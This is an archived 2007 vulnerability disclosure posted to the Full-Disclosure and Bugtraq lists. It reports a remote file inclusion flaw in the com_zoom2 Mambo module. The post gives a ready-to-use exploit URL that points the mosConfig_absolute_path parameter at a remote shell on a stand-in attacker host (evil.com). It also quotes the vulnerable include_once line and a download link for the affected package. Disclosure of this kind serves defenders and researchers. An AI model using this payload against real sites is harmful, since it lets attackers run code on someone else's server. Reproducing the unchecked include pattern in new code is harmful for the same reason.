
Date: Wed, 11 Apr 2007 04:24:47 +0200
From: "0o_zeus_o0 elitemexico.org" <zeus.olimpusklan@...il.com>
To: submit@...w0rm.com, bugtraq@...e-h.org, bugtraq@...urityfocus.com, 
	full-disclosure@...ts.grok.org.uk
Subject: com_zoom2 Mambo Module Remote File Include
	Vulnerability

com_zoom2 Mambo Module Remote File Include Vulnerability

##################

autor:0o_zeus_o0
website:www.diosdelared.com
mail:zeus@...sdelared.com
10/04/07

##################################

/components/com_zoom2/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http:/evil.com/shell.gif?

include_once("$mosConfig_absolute_path/components/com_zoom/classes/iptc/EXIF.php");

site download :
http://mamboxchange.com/frs/download.php/3740/com_zoom_25_Beta.zip

###################################################

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
